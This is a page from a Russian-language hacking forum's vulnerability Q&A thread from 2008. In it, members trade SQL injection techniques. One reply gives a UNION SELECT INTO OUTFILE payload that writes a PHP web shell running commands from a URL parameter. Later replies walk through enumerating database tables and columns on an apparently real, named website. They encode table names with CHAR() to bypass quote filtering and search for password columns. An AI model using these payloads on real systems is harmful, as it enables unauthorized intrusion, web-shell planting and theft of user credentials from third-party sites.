HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 219 из 2422 « Первая < 119169209 215 216 217 218 219 220 221 222 223 2292693197191219 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.05.2008, 04:55
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291

Репутация: 17
По умолчанию
а уязвимости движков на файлах и на базах сильна отличаются?
 
Ответить с цитированием

  #2  
Старый 31.05.2008, 05:05
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
Цитата:
Сообщение от Demetra  
а уязвимости движков на файлах и на базах сильна отличаются?
в чем суть вопроса то?
 
Ответить с цитированием

  #3  
Старый 31.05.2008, 11:40
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
>> а уязвимости движков на файлах и на базах сильна отличаются?

xss/lfi/rfi/exec - остаются такими же в движках на текстовых файлах. Единственное чего нету это sql-inj.
__________________
..
 
Ответить с цитированием

  #4  
Старый 31.05.2008, 13:33
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291

Репутация: 17
По умолчанию
ясна,это хорошо
 
Ответить с цитированием

  #5  
Старый 31.05.2008, 18:40
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию
Подскажите , есть слепок БД одного форума .
Смогу ли я методом INSERT INTO FILE залить туда шелл ?
Если можно с примером , в mysql не силён
Спасибо .
 
Ответить с цитированием

  #6  
Старый 31.05.2008, 19:11
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию
Термин "слепок БД" мне не знаком. Могу предположить, что это дамп базы. С дампом ты шелл, конечно, не зальешь. Метода INSERT INTO FILE нету =\. В случае с гипотетической инъекцией, можно сделать так: http://site.ru/?id=-1+UNION+SELECT+1,'<?php system($_GET[cmd]); ?>',3+INTO+OUTFILE+'полный путь до файла'/*. Выполнится, если есть file_priv в mysql.user и magic_quotes_gpc=off.
Последний раз редактировалось А®ТеS; 31.05.2008 в 19:16..
 
Ответить с цитированием

  #7  
Старый 31.05.2008, 21:14
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
Question
Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?
 
Ответить с цитированием

  #8  
Старый 31.05.2008, 21:19
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию
Цитата:
Сообщение от Xszz  
Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?
мое мнение - только если есть file_priv, у пользователя mysql.
ну или в самой базе содержится Php код, и потом выполняется в eval ... (очень редко такое бывает)
 
Ответить с цитированием

  #9  
Старый 31.05.2008, 23:07
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,table_nam e,3,4,5,6,7,8,9+from+information_schema.tables+lim it+23,2/*
Колонка форума с юзерами. но что дальше делать это я забыл ;( подскажите
 
Ответить с цитированием

  #10  
Старый 31.05.2008, 23:21
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию
Вообще то тебе дальше нужно узнать как называются столбики в найденой таблице, для этого нужно вывести поле column_name из таблицы information_schema.columns при этом указать where table_name='phpbb_acl_users' но если там кавычки фильруются то нужно закодировать допустим чаром вот так table_name=CHAR(112,104,112,98,98,95,97,99,108,95, 117,115,101,114,115)
Отсюда запрос будет таким
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_na me,3,4,5,6,7,8,9+from+information_schema.columns+w here+table_name=CHAR(112,104,112,98,98,95,97,99,10 8,95,117,115,101,114,115)/*
Потом лимитом перебираеш все столбики... НО... я глянул в это таблице вроде нету поле пароля...
Я обычно для ускорения делаю так
http://www.vturs.ru/index.php?mod=view&id=999+union+select+1,column_na me,3,4,5,6,7,8,table_name+from+information_schema. columns+where+column_name+LIKE+CHAR(37,112,97,115, 37)+limit+0,1/*
под чаром скрыто %pas% Это значит что я хочу вывести все столбики в которых есть сочетание 'pas' Можно конечно нарватся и на pwd тогда этот запрос не пройдет, но обычно значительно ускоряет процес.
Удачи!
 
Ответить с цитированием
Ответ
Страница 219 из 2422 « Первая < 119169209 215 216 217 218 219 220 221 222 223 2292693197191219 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ